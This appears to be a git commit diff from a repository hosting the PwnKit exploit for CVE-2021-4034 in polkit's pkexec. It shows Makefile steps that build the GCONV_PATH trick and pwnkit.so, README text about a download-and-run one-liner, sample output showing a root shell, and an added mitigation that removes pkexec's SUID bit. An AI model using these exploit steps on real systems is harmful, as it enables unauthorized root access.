Merge branch 'main' into patch-3
This commit is contained in:
commit
a5375a7d35
2
Makefile
2
Makefile
@ -15,7 +15,7 @@ gconv-modules:
|
|||||||
.PHONY: gconvpath
|
.PHONY: gconvpath
|
||||||
gconvpath:
|
gconvpath:
|
||||||
mkdir -p GCONV_PATH=.
|
mkdir -p GCONV_PATH=.
|
||||||
cp $(TRUE) GCONV_PATH=./pwnkit.so:.
|
cp -f $(TRUE) GCONV_PATH=./pwnkit.so:.
|
||||||
|
|
||||||
pwnkit.so: pwnkit.c
|
pwnkit.so: pwnkit.c
|
||||||
$(CC) $(CFLAGS) --shared -fPIC -o $@ $<
|
$(CC) $(CFLAGS) --shared -fPIC -o $@ $<
|
||||||
|
@ -63,7 +63,6 @@ vagrant@ubuntu-impish:~/CVE-2021-4034$ echo $?
|
|||||||
|
|
||||||
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
Polkit (formerly PolicyKit) is a component for controlling system-wide privileges in Unix-like operating systems. It provides an organized way for non-privileged processes to communicate with privileged processes. It is also possible to use polkit to execute commands with elevated privileges using the command pkexec followed by the command intended to be executed (with root permission).
|
||||||
|
|
||||||
|
|
||||||
# One-liner commands
|
# One-liner commands
|
||||||
|
|
||||||
You can easily exploit the system using a single script, downloadable and executable with this command:
|
You can easily exploit the system using a single script, downloadable and executable with this command:
|
||||||
@ -84,3 +83,10 @@ cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
|
|||||||
whoami
|
whoami
|
||||||
root
|
root
|
||||||
```
|
```
|
||||||
|
|
||||||
|
# Mitigation
|
||||||
|
|
||||||
|
If no patches are available for your operating system, you can remove the SUID-bit from pkexec as a temporary mitigation.
|
||||||
|
```
|
||||||
|
chmod 0755 /usr/bin/pkexec
|
||||||
|
```
|
Loading…
Reference in New Issue
Block a user